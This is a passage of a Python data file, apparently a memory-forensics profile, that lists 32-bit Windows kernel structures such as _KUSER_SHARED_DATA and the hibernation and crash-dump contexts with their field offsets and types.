'PerUserPolicy' : [ 0x0, ['array', 27, ['unsigned char']]],
} ],
'__unnamed_22db' : [ 0x8, {
'EndingOffset' : [ 0x0, ['pointer', ['_LARGE_INTEGER']]],
'ResourceToRelease' : [ 0x4, ['pointer', ['pointer', ['_ERESOURCE']]]],
} ],
'__unnamed_22dd' : [ 0x4, {
'ResourceToRelease' : [ 0x0, ['pointer', ['_ERESOURCE']]],
} ],
'__unnamed_22e1' : [ 0x8, {
'SyncType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'SyncTypeOther', 1: 'SyncTypeCreateSection'})]],
'PageProtection' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_22e5' : [ 0x8, {
'NotificationType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'NotifyTypeCreate', 1: 'NotifyTypeRetired'})]],
'SafeToRecurse' : [ 0x4, ['unsigned char']],
} ],
'__unnamed_22e7' : [ 0x14, {
'Argument1' : [ 0x0, ['pointer', ['void']]],
'Argument2' : [ 0x4, ['pointer', ['void']]],
'Argument3' : [ 0x8, ['pointer', ['void']]],
'Argument4' : [ 0xc, ['pointer', ['void']]],
'Argument5' : [ 0x10, ['pointer', ['void']]],
} ],
'_FS_FILTER_PARAMETERS' : [ 0x14, {
'AcquireForModifiedPageWriter' : [ 0x0, ['__unnamed_22db']],
'ReleaseForModifiedPageWriter' : [ 0x0, ['__unnamed_22dd']],
'AcquireForSectionSynchronization' : [ 0x0, ['__unnamed_22e1']],
'NotifyStreamFileObject' : [ 0x0, ['__unnamed_22e5']],
'Others' : [ 0x0, ['__unnamed_22e7']],
} ],
'_PROFILE_PARAMETER_BLOCK' : [ 0x10, {
'Status' : [ 0x0, ['unsigned short']],
'Reserved' : [ 0x2, ['unsigned short']],
'DockingState' : [ 0x4, ['unsigned short']],
'Capabilities' : [ 0x6, ['unsigned short']],
'DockID' : [ 0x8, ['unsigned long']],
'SerialNumber' : [ 0xc, ['unsigned long']],
} ],
'_COMPRESSED_DATA_INFO' : [ 0xc, {
'CompressionFormatAndEngine' : [ 0x0, ['unsigned short']],
'CompressionUnitShift' : [ 0x2, ['unsigned char']],
'ChunkShift' : [ 0x3, ['unsigned char']],
'ClusterShift' : [ 0x4, ['unsigned char']],
'Reserved' : [ 0x5, ['unsigned char']],
'NumberOfChunks' : [ 0x6, ['unsigned short']],
'CompressedChunkSizes' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_POP_HIBER_CONTEXT' : [ 0xa0, {
'WriteToFile' : [ 0x0, ['unsigned char']],
'ReserveLoaderMemory' : [ 0x1, ['unsigned char']],
'ReserveFreeMemory' : [ 0x2, ['unsigned char']],
'Reset' : [ 0x3, ['unsigned char']],
'HiberFlags' : [ 0x4, ['unsigned char']],
'WroteHiberFile' : [ 0x5, ['unsigned char']],
'MapFrozen' : [ 0x6, ['unsigned char']],
'MemoryMap' : [ 0x8, ['_RTL_BITMAP']],
'DiscardedMemoryPages' : [ 0x10, ['_RTL_BITMAP']],
'ClonedRanges' : [ 0x18, ['_LIST_ENTRY']],
'ClonedRangeCount' : [ 0x20, ['unsigned long']],
'NextCloneRange' : [ 0x24, ['pointer', ['_LIST_ENTRY']]],
'NextPreserve' : [ 0x28, ['unsigned long']],
'LoaderMdl' : [ 0x2c, ['pointer', ['_MDL']]],
'AllocatedMdl' : [ 0x30, ['pointer', ['_MDL']]],
'PagesOut' : [ 0x38, ['unsigned long long']],
'IoPages' : [ 0x40, ['pointer', ['void']]],
'IoPagesCount' : [ 0x44, ['unsigned long']],
'CurrentMcb' : [ 0x48, ['pointer', ['void']]],
'DumpStack' : [ 0x4c, ['pointer', ['_DUMP_STACK_CONTEXT']]],
'WakeState' : [ 0x50, ['pointer', ['_KPROCESSOR_STATE']]],
'PreferredIoWriteSize' : [ 0x54, ['unsigned long']],
'IoProgress' : [ 0x58, ['unsigned long']],
'HiberVa' : [ 0x5c, ['unsigned long']],
'HiberPte' : [ 0x60, ['_LARGE_INTEGER']],
'Status' : [ 0x68, ['long']],
'MemoryImage' : [ 0x6c, ['pointer', ['PO_MEMORY_IMAGE']]],
'CompressionWorkspace' : [ 0x70, ['pointer', ['void']]],
'CompressedWriteBuffer' : [ 0x74, ['pointer', ['unsigned char']]],
'CompressedWriteBufferSize' : [ 0x78, ['unsigned long']],
'MaxCompressedOutputSize' : [ 0x7c, ['unsigned long']],
'PerformanceStats' : [ 0x80, ['pointer', ['unsigned long']]],
'CompressionBlock' : [ 0x84, ['pointer', ['void']]],
'DmaIO' : [ 0x88, ['pointer', ['void']]],
'TemporaryHeap' : [ 0x8c, ['pointer', ['void']]],
'BootLoaderLogMdl' : [ 0x90, ['pointer', ['_MDL']]],
'FirmwareRuntimeInformationMdl' : [ 0x94, ['pointer', ['_MDL']]],
'ResumeContext' : [ 0x98, ['pointer', ['void']]],
'ResumeContextPages' : [ 0x9c, ['unsigned long']],
} ],
'_OBJECT_REF_TRACE' : [ 0x40, {
'StackTrace' : [ 0x0, ['array', 16, ['pointer', ['void']]]],
} ],
'_OBJECT_NAME_INFORMATION' : [ 0x8, {
'Name' : [ 0x0, ['_UNICODE_STRING']],
} ],
'_PCW_COUNTER_INFORMATION' : [ 0x10, {
'CounterMask' : [ 0x0, ['unsigned long long']],
'InstanceMask' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
} ],
'_DUMP_STACK_CONTEXT' : [ 0xb0, {
'Init' : [ 0x0, ['_DUMP_INITIALIZATION_CONTEXT']],
'PartitionOffset' : [ 0x70, ['_LARGE_INTEGER']],
'DumpPointers' : [ 0x78, ['pointer', ['void']]],
'PointersLength' : [ 0x7c, ['unsigned long']],
'ModulePrefix' : [ 0x80, ['pointer', ['unsigned short']]],
'DriverList' : [ 0x84, ['_LIST_ENTRY']],
'InitMsg' : [ 0x8c, ['_STRING']],
'ProgMsg' : [ 0x94, ['_STRING']],
'DoneMsg' : [ 0x9c, ['_STRING']],
'FileObject' : [ 0xa4, ['pointer', ['void']]],
'UsageType' : [ 0xa8, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceUsageTypeUndefined', 1: 'DeviceUsageTypePaging', 2: 'DeviceUsageTypeHibernation', 3: 'DeviceUsageTypeDumpFile'})]],
} ],
'_FILE_STANDARD_INFORMATION' : [ 0x18, {
'AllocationSize' : [ 0x0, ['_LARGE_INTEGER']],
'EndOfFile' : [ 0x8, ['_LARGE_INTEGER']],
'NumberOfLinks' : [ 0x10, ['unsigned long']],
'DeletePending' : [ 0x14, ['unsigned char']],
'Directory' : [ 0x15, ['unsigned char']],
} ],
'_POP_SHUTDOWN_BUG_CHECK' : [ 0x20, {
'ThreadHandle' : [ 0x0, ['pointer', ['void']]],
'ThreadId' : [ 0x4, ['pointer', ['void']]],
'ProcessId' : [ 0x8, ['pointer', ['void']]],
'Code' : [ 0xc, ['unsigned long']],
'Parameter1' : [ 0x10, ['unsigned long']],
'Parameter2' : [ 0x14, ['unsigned long']],
'Parameter3' : [ 0x18, ['unsigned long']],
'Parameter4' : [ 0x1c, ['unsigned long']],
} ],
'_MI_EXTRA_IMAGE_INFORMATION' : [ 0x8, {
'SizeOfHeaders' : [ 0x0, ['unsigned long']],
'SizeOfImage' : [ 0x4, ['unsigned long']],
} ],
'_PCW_MASK_INFORMATION' : [ 0x20, {
'CounterMask' : [ 0x0, ['unsigned long long']],
'InstanceMask' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
'InstanceId' : [ 0xc, ['unsigned long']],
'CollectMultiple' : [ 0x10, ['unsigned char']],
'Buffer' : [ 0x14, ['pointer', ['_PCW_BUFFER']]],
'CancelEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
} ],
'_RTL_HANDLE_TABLE_ENTRY' : [ 0x4, {
'Flags' : [ 0x0, ['unsigned long']],
'NextFree' : [ 0x0, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
} ],
'__unnamed_230b' : [ 0x10, {
'TestAllocation' : [ 0x0, ['_ARBITER_TEST_ALLOCATION_PARAMETERS']],
'RetestAllocation' : [ 0x0, ['_ARBITER_RETEST_ALLOCATION_PARAMETERS']],
'BootAllocation' : [ 0x0, ['_ARBITER_BOOT_ALLOCATION_PARAMETERS']],
'QueryAllocatedResources' : [ 0x0, ['_ARBITER_QUERY_ALLOCATED_RESOURCES_PARAMETERS']],
'QueryConflict' : [ 0x0, ['_ARBITER_QUERY_CONFLICT_PARAMETERS']],
'QueryArbitrate' : [ 0x0, ['_ARBITER_QUERY_ARBITRATE_PARAMETERS']],
'AddReserved' : [ 0x0, ['_ARBITER_ADD_RESERVED_PARAMETERS']],
} ],
'_ARBITER_PARAMETERS' : [ 0x10, {
'Parameters' : [ 0x0, ['__unnamed_230b']],
} ],
'__unnamed_230f' : [ 0x8, {
'idxRecord' : [ 0x0, ['unsigned long']],
'cidContainer' : [ 0x4, ['unsigned long']],
} ],
'_CLS_LSN' : [ 0x8, {
'offset' : [ 0x0, ['__unnamed_230f']],
'ullOffset' : [ 0x0, ['unsigned long long']],
} ],
'POWER_ACTION_POLICY' : [ 0xc, {
'Action' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
'Flags' : [ 0x4, ['unsigned long']],
'EventCode' : [ 0x8, ['unsigned long']],
} ],
'PO_MEMORY_IMAGE' : [ 0xe0, {
'Signature' : [ 0x0, ['unsigned long']],
'ImageType' : [ 0x4, ['unsigned long']],
'CheckSum' : [ 0x8, ['unsigned long']],
'LengthSelf' : [ 0xc, ['unsigned long']],
'PageSelf' : [ 0x10, ['unsigned long']],
'PageSize' : [ 0x14, ['unsigned long']],
'SystemTime' : [ 0x18, ['_LARGE_INTEGER']],
'InterruptTime' : [ 0x20, ['unsigned long long']],
'FeatureFlags' : [ 0x28, ['unsigned long']],
'HiberFlags' : [ 0x2c, ['unsigned char']],
'spare' : [ 0x2d, ['array', 3, ['unsigned char']]],
'NoHiberPtes' : [ 0x30, ['unsigned long']],
'HiberVa' : [ 0x34, ['unsigned long']],
'HiberPte' : [ 0x38, ['_LARGE_INTEGER']],
'NoFreePages' : [ 0x40, ['unsigned long']],
'FreeMapCheck' : [ 0x44, ['unsigned long']],
'WakeCheck' : [ 0x48, ['unsigned long']],
'FirstTablePage' : [ 0x4c, ['unsigned long']],
'PerfInfo' : [ 0x50, ['_PO_HIBER_PERF']],
'FirmwareRuntimeInformationPages' : [ 0xa8, ['unsigned long']],
'FirmwareRuntimeInformation' : [ 0xac, ['array', 1, ['unsigned long']]],
'NoBootLoaderLogPages' : [ 0xb0, ['unsigned long']],
'BootLoaderLogPages' : [ 0xb4, ['array', 8, ['unsigned long']]],
'NotUsed' : [ 0xd4, ['unsigned long']],
'ResumeContextCheck' : [ 0xd8, ['unsigned long']],
'ResumeContextPages' : [ 0xdc, ['unsigned long']],
} ],
'EX_QUEUE_WORKER_INFO' : [ 0x4, {
'QueueDisabled' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'MakeThreadsAsNecessary' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'WaitMode' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WorkerCount' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'QueueWorkerInfo' : [ 0x0, ['long']],
} ],
'BATTERY_REPORTING_SCALE' : [ 0x8, {
'Granularity' : [ 0x0, ['unsigned long']],
'Capacity' : [ 0x4, ['unsigned long']],
} ],
'_CURDIR' : [ 0xc, {
'DosPath' : [ 0x0, ['_UNICODE_STRING']],
'Handle' : [ 0x8, ['pointer', ['void']]],
} ],
'_PO_HIBER_PERF' : [ 0x58, {
'IoTicks' : [ 0x0, ['unsigned long long']],
'InitTicks' : [ 0x8, ['unsigned long long']],
'CopyTicks' : [ 0x10, ['unsigned long long']],
'ElapsedTicks' : [ 0x18, ['unsigned long long']],
'CompressTicks' : [ 0x20, ['unsigned long long']],
'ResumeAppTime' : [ 0x28, ['unsigned long long']],
'HiberFileResumeTime' : [ 0x30, ['unsigned long long']],
'BytesCopied' : [ 0x38, ['unsigned long long']],
'PagesProcessed' : [ 0x40, ['unsigned long long']],
'PagesWritten' : [ 0x48, ['unsigned long']],
'DumpCount' : [ 0x4c, ['unsigned long']],
'FileRuns' : [ 0x50, ['unsigned long']],
} ],
'_DEVICE_FLAGS' : [ 0x4, {
'Failed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Removable' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ConsoleIn' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ConsoleOut' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Input' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Output' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
} ],
'_RTL_BALANCED_LINKS' : [ 0x10, {
'Parent' : [ 0x0, ['pointer', ['_RTL_BALANCED_LINKS']]],
'LeftChild' : [ 0x4, ['pointer', ['_RTL_BALANCED_LINKS']]],
'RightChild' : [ 0x8, ['pointer', ['_RTL_BALANCED_LINKS']]],
'Balance' : [ 0xc, ['unsigned char']],
'Reserved' : [ 0xd, ['array', 3, ['unsigned char']]],
} ],
'_MMVIEW' : [ 0x18, {
'Entry' : [ 0x0, ['unsigned long']],
'Writable' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ControlArea' : [ 0x4, ['pointer', ['_CONTROL_AREA']]],
'ViewLinks' : [ 0x8, ['_LIST_ENTRY']],
'SessionViewVa' : [ 0x10, ['pointer', ['void']]],
'SessionId' : [ 0x14, ['unsigned long']],
} ],
'_MM_SESSION_SPACE_FLAGS' : [ 0x4, {
'Initialized' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DeletePending' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'PoolInitialized' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'DynamicVaInitialized' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'WsInitialized' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'PoolDestroyed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'ObjectInitialized' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Filler' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
} ],
'_HEADLESS_LOADER_BLOCK' : [ 0x34, {
'UsedBiosSettings' : [ 0x0, ['unsigned char']],
'DataBits' : [ 0x1, ['unsigned char']],
'StopBits' : [ 0x2, ['unsigned char']],
'Parity' : [ 0x3, ['unsigned char']],
'BaudRate' : [ 0x4, ['unsigned long']],
'PortNumber' : [ 0x8, ['unsigned long']],
'PortAddress' : [ 0xc, ['pointer', ['unsigned char']]],
'PciDeviceId' : [ 0x10, ['unsigned short']],
'PciVendorId' : [ 0x12, ['unsigned short']],
'PciBusNumber' : [ 0x14, ['unsigned char']],
'PciBusSegment' : [ 0x16, ['unsigned short']],
'PciSlotNumber' : [ 0x18, ['unsigned char']],
'PciFunctionNumber' : [ 0x19, ['unsigned char']],
'PciFlags' : [ 0x1c, ['unsigned long']],
'SystemGUID' : [ 0x20, ['_GUID']],
'IsMMIODevice' : [ 0x30, ['unsigned char']],
'TerminalType' : [ 0x31, ['unsigned char']],
} ],
'__unnamed_2337' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned long']],
'CheckSum' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_2339' : [ 0x10, {
'DiskId' : [ 0x0, ['_GUID']],
} ],
'__unnamed_233b' : [ 0x10, {
'Mbr' : [ 0x0, ['__unnamed_2337']],
'Gpt' : [ 0x0, ['__unnamed_2339']],
} ],
'_DUMP_INITIALIZATION_CONTEXT' : [ 0x70, {
'Length' : [ 0x0, ['unsigned long']],
'Reserved' : [ 0x4, ['unsigned long']],
'MemoryBlock' : [ 0x8, ['pointer', ['void']]],
'CommonBuffer' : [ 0xc, ['array', 2, ['pointer', ['void']]]],
'PhysicalAddress' : [ 0x18, ['array', 2, ['_LARGE_INTEGER']]],
'StallRoutine' : [ 0x28, ['pointer', ['void']]],
'OpenRoutine' : [ 0x2c, ['pointer', ['void']]],
'WriteRoutine' : [ 0x30, ['pointer', ['void']]],
'FinishRoutine' : [ 0x34, ['pointer', ['void']]],
'AdapterObject' : [ 0x38, ['pointer', ['_ADAPTER_OBJECT']]],
'MappedRegisterBase' : [ 0x3c, ['pointer', ['void']]],
'PortConfiguration' : [ 0x40, ['pointer', ['void']]],
'CrashDump' : [ 0x44, ['unsigned char']],
'MaximumTransferSize' : [ 0x48, ['unsigned long']],
'CommonBufferSize' : [ 0x4c, ['unsigned long']],
'TargetAddress' : [ 0x50, ['pointer', ['void']]],
'WritePendingRoutine' : [ 0x54, ['pointer', ['void']]],
'PartitionStyle' : [ 0x58, ['unsigned long']],
'DiskInfo' : [ 0x5c, ['__unnamed_233b']],
} ],
'_MI_SYSTEM_PTE_TYPE' : [ 0x30, {
'Bitmap' : [ 0x0, ['_RTL_BITMAP']],
'Flags' : [ 0x8, ['unsigned long']],
'Hint' : [ 0xc, ['unsigned long']],
'BasePte' : [ 0x10, ['pointer', ['_MMPTE']]],
'FailureCount' : [ 0x14, ['pointer', ['unsigned long']]],
'Vm' : [ 0x18, ['pointer', ['_MMSUPPORT']]],
'TotalSystemPtes' : [ 0x1c, ['long']],
'TotalFreeSystemPtes' : [ 0x20, ['long']],
'CachedPteCount' : [ 0x24, ['long']],
'PteFailures' : [ 0x28, ['unsigned long']],
'SpinLock' : [ 0x2c, ['unsigned long']],
'GlobalMutex' : [ 0x2c, ['pointer', ['_KGUARDED_MUTEX']]],
} ],
'_NETWORK_LOADER_BLOCK' : [ 0x10, {
'DHCPServerACK' : [ 0x0, ['pointer', ['unsigned char']]],
'DHCPServerACKLength' : [ 0x4, ['unsigned long']],
'BootServerReplyPacket' : [ 0x8, ['pointer', ['unsigned char']]],
'BootServerReplyPacketLength' : [ 0xc, ['unsigned long']],
} ],
'_CM_KEY_SECURITY' : [ 0x28, {
'Signature' : [ 0x0, ['unsigned short']],
'Reserved' : [ 0x2, ['unsigned short']],
'Flink' : [ 0x4, ['unsigned long']],
'Blink' : [ 0x8, ['unsigned long']],
'ReferenceCount' : [ 0xc, ['unsigned long']],
'DescriptorLength' : [ 0x10, ['unsigned long']],
'Descriptor' : [ 0x14, ['_SECURITY_DESCRIPTOR_RELATIVE']],
} ],
'_PO_DEVICE_NOTIFY_ORDER' : [ 0x170, {
'Locked' : [ 0x0, ['unsigned char']],
'WarmEjectPdoPointer' : [ 0x4, ['pointer', ['pointer', ['_DEVICE_OBJECT']]]],
'OrderLevel' : [ 0x8, ['array', 9, ['_PO_NOTIFY_ORDER_LEVEL']]],
} ],
'_ARBITER_CONFLICT_INFO' : [ 0x18, {
'OwningObject' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'Start' : [ 0x8, ['unsigned long long']],
'End' : [ 0x10, ['unsigned long long']],
} ],
'_PO_NOTIFY_ORDER_LEVEL' : [ 0x28, {
'DeviceCount' : [ 0x0, ['unsigned long']],
'ActiveCount' : [ 0x4, ['unsigned long']],
'WaitSleep' : [ 0x8, ['_LIST_ENTRY']],
'ReadySleep' : [ 0x10, ['_LIST_ENTRY']],
'ReadyS0' : [ 0x18, ['_LIST_ENTRY']],
'WaitS0' : [ 0x20, ['_LIST_ENTRY']],
} ],
'_THREAD_PERFORMANCE_DATA' : [ 0x1c0, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'ProcessorNumber' : [ 0x4, ['_PROCESSOR_NUMBER']],
'ContextSwitches' : [ 0x8, ['unsigned long']],
'HwCountersCount' : [ 0xc, ['unsigned long']],
'UpdateCount' : [ 0x10, ['unsigned long long']],
'WaitReasonBitMap' : [ 0x18, ['unsigned long long']],
'HardwareCounters' : [ 0x20, ['unsigned long long']],
'CycleTime' : [ 0x28, ['_COUNTER_READING']],
'HwCounters' : [ 0x40, ['array', 16, ['_COUNTER_READING']]],
} ],
'_ETW_REPLY_QUEUE' : [ 0x2c, {
'Queue' : [ 0x0, ['_KQUEUE']],
'EventsLost' : [ 0x28, ['long']],
} ],
'_ARBITER_QUERY_ALLOCATED_RESOURCES_PARAMETERS' : [ 0x4, {
'AllocatedResources' : [ 0x0, ['pointer', ['pointer', ['_CM_PARTIAL_RESOURCE_LIST']]]],
} ],
'_KSPECIAL_REGISTERS' : [ 0x54, {
'Cr0' : [ 0x0, ['unsigned long']],
'Cr2' : [ 0x4, ['unsigned long']],
'Cr3' : [ 0x8, ['unsigned long']],
'Cr4' : [ 0xc, ['unsigned long']],
'KernelDr0' : [ 0x10, ['unsigned long']],
'KernelDr1' : [ 0x14, ['unsigned long']],
'KernelDr2' : [ 0x18, ['unsigned long']],
'KernelDr3' : [ 0x1c, ['unsigned long']],
'KernelDr6' : [ 0x20, ['unsigned long']],
'KernelDr7' : [ 0x24, ['unsigned long']],
'Gdtr' : [ 0x28, ['_DESCRIPTOR']],
'Idtr' : [ 0x30, ['_DESCRIPTOR']],
'Tr' : [ 0x38, ['unsigned short']],
'Ldtr' : [ 0x3a, ['unsigned short']],
'Reserved' : [ 0x3c, ['array', 6, ['unsigned long']]],
} ],
'_RTL_ACTIVATION_CONTEXT_STACK_FRAME' : [ 0xc, {
'Previous' : [ 0x0, ['pointer', ['_RTL_ACTIVATION_CONTEXT_STACK_FRAME']]],
'ActivationContext' : [ 0x4, ['pointer', ['_ACTIVATION_CONTEXT']]],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_ARBITER_ORDERING' : [ 0x10, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
} ],
'_RTL_AVL_TABLE' : [ 0x38, {
'BalancedRoot' : [ 0x0, ['_RTL_BALANCED_LINKS']],
'OrderedPointer' : [ 0x10, ['pointer', ['void']]],
'WhichOrderedElement' : [ 0x14, ['unsigned long']],
'NumberGenericTableElements' : [ 0x18, ['unsigned long']],
'DepthOfTree' : [ 0x1c, ['unsigned long']],
'RestartKey' : [ 0x20, ['pointer', ['_RTL_BALANCED_LINKS']]],
'DeleteCount' : [ 0x24, ['unsigned long']],
'CompareRoutine' : [ 0x28, ['pointer', ['void']]],
'AllocateRoutine' : [ 0x2c, ['pointer', ['void']]],
'FreeRoutine' : [ 0x30, ['pointer', ['void']]],
'TableContext' : [ 0x34, ['pointer', ['void']]],
} ],
'_KTRANSACTION_HISTORY' : [ 0x8, {
'RecordType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {1: 'KTMOH_CommitTransaction_Result', 2: 'KTMOH_RollbackTransaction_Result'})]],
'Payload' : [ 0x4, ['unsigned long']],
} ],
'_DESCRIPTOR' : [ 0x8, {
'Pad' : [ 0x0, ['unsigned short']],
'Limit' : [ 0x2, ['unsigned short']],
'Base' : [ 0x4, ['unsigned long']],
} ],
'LIST_ENTRY64' : [ 0x10, {
'Flink' : [ 0x0, ['unsigned long long']],
'Blink' : [ 0x8, ['unsigned long long']],
} ],
'LIST_ENTRY32' : [ 0x8, {
'Flink' : [ 0x0, ['unsigned long']],
'Blink' : [ 0x4, ['unsigned long']],
} ],
'_KSYSTEM_TIME' : [ 0xc, {
'LowPart' : [ 0x0, ['unsigned long']],
'High1Time' : [ 0x4, ['long']],
'High2Time' : [ 0x8, ['long']],
} ],
'_KUSER_SHARED_DATA' : [ 0x5f0, {
'TickCountLowDeprecated' : [ 0x0, ['unsigned long']],
'TickCountMultiplier' : [ 0x4, ['unsigned long']],
'InterruptTime' : [ 0x8, ['_KSYSTEM_TIME']],
'SystemTime' : [ 0x14, ['_KSYSTEM_TIME']],
'TimeZoneBias' : [ 0x20, ['_KSYSTEM_TIME']],
'ImageNumberLow' : [ 0x2c, ['unsigned short']],
'ImageNumberHigh' : [ 0x2e, ['unsigned short']],
'NtSystemRoot' : [ 0x30, ['array', 260, ['wchar']]],
'MaxStackTraceDepth' : [ 0x238, ['unsigned long']],
'CryptoExponent' : [ 0x23c, ['unsigned long']],
'TimeZoneId' : [ 0x240, ['unsigned long']],
'LargePageMinimum' : [ 0x244, ['unsigned long']],
'Reserved2' : [ 0x248, ['array', 7, ['unsigned long']]],
'NtProductType' : [ 0x264, ['Enumeration', dict(target = 'long', choices = {1: 'NtProductWinNt', 2: 'NtProductLanManNt', 3: 'NtProductServer'})]],
'ProductTypeIsValid' : [ 0x268, ['unsigned char']],
'NtMajorVersion' : [ 0x26c, ['unsigned long']],
'NtMinorVersion' : [ 0x270, ['unsigned long']],
'ProcessorFeatures' : [ 0x274, ['array', 64, ['unsigned char']]],
'Reserved1' : [ 0x2b4, ['unsigned long']],
'Reserved3' : [ 0x2b8, ['unsigned long']],
'TimeSlip' : [ 0x2bc, ['unsigned long']],
'AlternativeArchitecture' : [ 0x2c0, ['Enumeration', dict(target = 'long', choices = {0: 'StandardDesign', 1: 'NEC98x86', 2: 'EndAlternatives'})]],
'AltArchitecturePad' : [ 0x2c4, ['array', 1, ['unsigned long']]],
'SystemExpirationDate' : [ 0x2c8, ['_LARGE_INTEGER']],
'SuiteMask' : [ 0x2d0, ['unsigned long']],
'KdDebuggerEnabled' : [ 0x2d4, ['unsigned char']],
'NXSupportPolicy' : [ 0x2d5, ['unsigned char']],
'ActiveConsoleId' : [ 0x2d8, ['unsigned long']],
'DismountCount' : [ 0x2dc, ['unsigned long']],
'ComPlusPackage' : [ 0x2e0, ['unsigned long']],
'LastSystemRITEventTickCount' : [ 0x2e4, ['unsigned long']],
'NumberOfPhysicalPages' : [ 0x2e8, ['unsigned long']],
'SafeBootMode' : [ 0x2ec, ['unsigned char']],
'TscQpcData' : [ 0x2ed, ['unsigned char']],
'TscQpcEnabled' : [ 0x2ed, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'TscQpcSpareFlag' : [ 0x2ed, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'TscQpcShift' : [ 0x2ed, ['BitField', dict(start_bit = 2, end_bit = 8, native_type='unsigned char')]],
'TscQpcPad' : [ 0x2ee, ['array', 2, ['unsigned char']]],
'SharedDataFlags' : [ 0x2f0, ['unsigned long']],
'DbgErrorPortPresent' : [ 0x2f0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DbgElevationEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'DbgVirtEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'DbgInstallerDetectEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'DbgSystemDllRelocated' : [ 0x2f0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'DbgDynProcessorEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'DbgSEHValidationEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SpareBits' : [ 0x2f0, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
'DataFlagsPad' : [ 0x2f4, ['array', 1, ['unsigned long']]],
'TestRetInstruction' : [ 0x2f8, ['unsigned long long']],
'SystemCall' : [ 0x300, ['unsigned long']],
'SystemCallReturn' : [ 0x304, ['unsigned long']],
'SystemCallPad' : [ 0x308, ['array', 3, ['unsigned long long']]],
'TickCount' : [ 0x320, ['_KSYSTEM_TIME']],
'TickCountQuad' : [ 0x320, ['unsigned long long']],
'ReservedTickCountOverlay' : [ 0x320, ['array', 3, ['unsigned long']]],
'TickCountPad' : [ 0x32c, ['array', 1, ['unsigned long']]],
'Cookie' : [ 0x330, ['unsigned long']],
'CookiePad' : [ 0x334, ['array', 1, ['unsigned long']]],
'ConsoleSessionForegroundProcessId' : [ 0x338, ['long long']],
'Wow64SharedInformation' : [ 0x340, ['array', 16, ['unsigned long']]],
'UserModeGlobalLogger' : [ 0x380, ['array', 16, ['unsigned short']]],
'ImageFileExecutionOptions' : [ 0x3a0, ['unsigned long']],
'LangGenerationCount' : [ 0x3a4, ['unsigned long']],
'Reserved5' : [ 0x3a8, ['unsigned long long']],
'InterruptTimeBias' : [ 0x3b0, ['unsigned long long']],
'TscQpcBias' : [ 0x3b8, ['unsigned long long']],
'ActiveProcessorCount' : [ 0x3c0, ['unsigned long']],
'ActiveGroupCount' : [ 0x3c4, ['unsigned short']],
'Reserved4' : [ 0x3c6, ['unsigned short']],
'AitSamplingValue' : [ 0x3c8, ['unsigned long']],
'AppCompatFlag' : [ 0x3cc, ['unsigned long']],
'SystemDllNativeRelocation' : [ 0x3d0, ['unsigned long long']],
'SystemDllWowRelocation' : [ 0x3d8, ['unsigned long']],
'XStatePad' : [ 0x3dc, ['array', 1, ['unsigned long']]],
